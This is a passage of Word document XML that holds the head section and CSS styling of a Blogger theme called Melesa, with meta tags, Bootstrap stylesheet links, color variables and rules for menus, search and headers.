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0123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8" ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:if cond='data:blog.pageType == &amp;quot;index&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;title&gt;&lt;data:blog.pageTitle/&gt;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:if cond='data:blog.pageType != &amp;quot;error_page&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;title&gt;&lt;data:blog.pageName/&gt; - &lt;data:blog.title/&gt;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:if&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:if cond='data:blog.pageType == &amp;quot;error_page&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;title&gt;Page Not Found - &lt;data:blog.title/&gt;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;!--META--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;meta charset='utf-8'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;meta content='width' name='MobileOptimized'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;meta content='true' name='HandheldFriendly'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;meta content='yes' name='apple-mobile-web-app-capable'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;meta content='index,nofollow' name='robots'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;meta content='width=device-width, initial-scale=1, maximum-scale=1' name='viewport'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;!-- Blogger main head data and meta --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:include data='blog' name='all-head-content'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;link href='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css' rel='stylesheet'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;link crossorigin='anonymous' href='https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css' integrity='sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M' rel='stylesheet'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:skin&gt;&lt;![CDATA[/* </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>-----------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>Templae Name: Melesa Blogger Template</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">Release Date : 02 October 2018, 09:11 PM (Indian Standard Time)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>Author :     Blossom Themes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>Author URI : https://blossomthemes.blogspot.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>License:     Premium Version Licence of Blossom Themes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>----------------------------------------------- */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Variable definitions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>====================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Group description="Melesa Theme Options"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Variable name="maincolor" description="Main Color of theme" type="color" default="#ff8989" value="#ff8989"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Variable name="darkcolor" description="Dark Color of theme" type="color" default="#5b5b60" value="#5b5b60"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Variable name="bagocolor" description="Background Color of theme" type="color" default="#ffffff" value="#ffffff"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/Group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Group description="Melesa Header Options"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Variable name="linkcolor" description="Menu Links Color" type="color" default="#5b5b60" value="#5b5b60"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Variable name="tickercolor" description="News Ticker Text Color" type="color" default="#5b5b60" value="#5b5b60"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/Group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;Group description="Melesa Footer Options"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Variable name="fbgcolor" description="Footer Background" type="color" default="#5b5b60" value="#222222"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;Variable name="ftxtcolor" description="Footer Text Color" type="color" default="#ffffff" value="#ffffff"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/Group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Selection */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>*::selection {background: $maincolor;color: $darkcolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>*::-o-selection {background: $maincolor;color: $darkcolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>*::-moz-selection {background: $maincolor;color: $darkcolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>*::-webkit-selection {background: $maincolor;color: $darkcolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Basic */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>html,body{font-family:'Montserrat', sans-serif;font-weight:300;font-size:12px;letter-spacing: 0.1em;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body{display: inline;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>h1,h2,h3,h4,h5,h6,.title{font-family:'Gilda Display', serif;font-weight:400;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>img{max-width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>a{color:$darkcolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>a:hover{color:$maincolor;text-decoration:none;transition: .2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.column-left-outer{margin-left:0% !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>body .content-inner{padding:0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.post-body blockquote{padding:20px 25px;position:relative;color:#777;margin:10px 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.post-body blockquote:before{content: "";position: absolute;left: 0px;width: 2px;height: 100%;top:0px;display: table;background: $maincolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.post-body ul{list-style-type: square;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.post-body blockquote{  font-family: Montserrat, sans-serif;letter-spacing: 0.04em;text-align: left;text-transform: none;color: #5b5b60;  font-size: 18px;line-height: 1.33;font-weight: 800;font-style: italic;  border-left: 0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.post-body{line-height: 1.5;letter-spacing:0.3px;margin-bottom:15px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#melesa-bottom-advertisement{margin: 10px 0px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.column-left-outer,.column-right-outer{position: relative;display: table;width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#left-sidebar-area, #right-sidebar-area{text-align: }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.column-left-inner, .column-right-inner{max-width: 320px;margin: 0 auto;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.blog-posts{margin-bottom: 20px;display: table}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.post-body{  font-style: normal;font-weight: 300;font-size: 12px;line-height: 2;font-family: Montserrat, sans-serif;letter-spacing: 0.04em;text-align: left;text-transform: none;color: #5b5b60;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*SF menu*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu, .sf-menu *{margin:0;padding:0;list-style:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu ul{padding:0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu li{position:relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu ul{position:absolute;display:none;top:100%;left:0;z-index:99;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu &gt; li{float:left;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu li:hover &gt; ul,.sf-menu li.sfHover &gt; ul{display:block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu a{display:block;position:relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu ul ul{top:0;left:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu{float:left;margin-bottom:1em;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu ul{min-width:12em;*width:12em;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu a{padding:.75em 1em;text-decoration:none;zoom:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu li{white-space:nowrap;*white-space:normal;-webkit-transition:background .2s;transition:background .2s;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.sf-menu li:hover,.sf-menu li.sfHover{-webkit-transition:none;transition:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Search*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.search-activity{display:none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.searchwrap{position:fixed;top:0px;left:0px;z-index:99;right:0px;bottom:0px;height:100%;width:100%;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.searchbox-inner{position:relative;display:table;width:100%;height:100%;text-align:center;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.topmenus{z-index:19;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.search-box{display:table-cell;vertical-align:middle;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.search-box a.s_close{color:#fff;float:right;font-size:30px;position:fixed;top:30px;right:30px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.search-box input{background:transparent;color:#fff;border:transparent;border-bottom:1px solid #fff;font-size:25px;width:80%;font-family:Open Sans;font-weight:200;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.search-box button{border:transparent;background:transparent;color:#fff;font-size:30px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.searchoverlay{background: $maincolor;opacity: 0.9;position: absolute;width: 100%;height:100%;display: table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*HEADERS*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .responsive-navigation{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .advertisement-top .topadvert{margin: 0px;margin-top:28px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .navigationmenu{display:inline-block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header #NavG{margin: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header ul.sf-menu{padding: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#header h1{font-weight:600;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#header img{max-width: 100%;max-height: 90px;width:auto;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li.has-submenu &gt; a:after{content: "\f123";font-family: "Ionicons";padding-left: 10px;font-size:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .sf-menu &gt; li &gt; ul &gt; li.has-submenu &gt; a:after{content: "\f125";font-family: "Ionicons";padding-left: 10px;position: absolute;top: 50%;right: 19px;margin-top: -9px;line-height: 19px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.search-act{float: right}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.search-act a{padding: 0 14px;line-height: 48px;font-size: 22px;color: $darkcolor;font-weight: 500;text-transform: uppercase;-webkit-backface-visibility: hidden;font-family: 'Open Sans', sans-serif;font-weight: 700;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega .mega-img{width:100%;height:150px;display:block;background-position:center center !important;background-size:cover !important;transition:.1s all ease-in-out;border-radius:5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega .megamenu-item .imgthumb a{padding:10px;padding-top: 25px;padding-bottom:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega .megamenu-item .imglink a{padding:10px;padding-bottom:15px;padding-top:0px;white-space:initial !important;font-size: 16px;font-family:'Gilda Display', serif;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.imglink .date-pub{padding: 5px 10px;  display: block;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .descriptionwrapper{margin: 0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.megamenu-item{position: relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-clear{clear: both}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.mega-naver .mega-navs{padding:0px !important; display: inline-block;margin-right: 7px;width: 25px;height: 25px;line-height: 25px;border: 1px solid #dcdcdc;text-align: center;vertical-align: middle;font-size: 7px;color: #b7b7b7;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-naver .mega-navs i{line-height: 24px}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-naver{margin: 5px 20px;clear: left;display: table;width: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-naver .mega-navs:hover{border-color: $maincolor;color: $maincolor}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-naver .mega-navs.disable{color:#b7b7b7 !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-naver .mega-navs.disable:hover{background:rgba(0,0,0,0);border-color: #dcdcdc;color:#b7b7b7 !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-naver .mega-navs.disable:hover i {color:#b7b7b7 !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-item-wrap{position: relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-loading{position: absolute;left: 0px;right: 0px;background:rgba(255,255,255,0.7);top:0px;bottom:0px;text-align:center;display: none;width: 100%;height: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-loading .mega-table{display: table-cell;vertical-align: middle;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mega-cell h3{font-size:16px;font-family:Open Sans;font-weight:600;text-transform:uppercase;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .static-object ul{width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>header .mega-item-wrap{width:100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* LOADING ANIMATION */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube{width:56px;height:56px;margin:0 auto;margin-top:37px;position:relative;transform:rotateZ(45deg);-o-transform:rotateZ(45deg);-ms-transform:rotateZ(45deg);-webkit-transform:rotateZ(45deg);-moz-transform:rotateZ(45deg);margin-bottom:40px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.cssload-thecube .cssload-cube{position:relative;transform:rotateZ(45deg);-o-transform:rotateZ(45deg);-ms-transform:rotateZ(45deg);-webkit-transform:rotateZ(45deg);-moz-transform:rotateZ(45deg);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
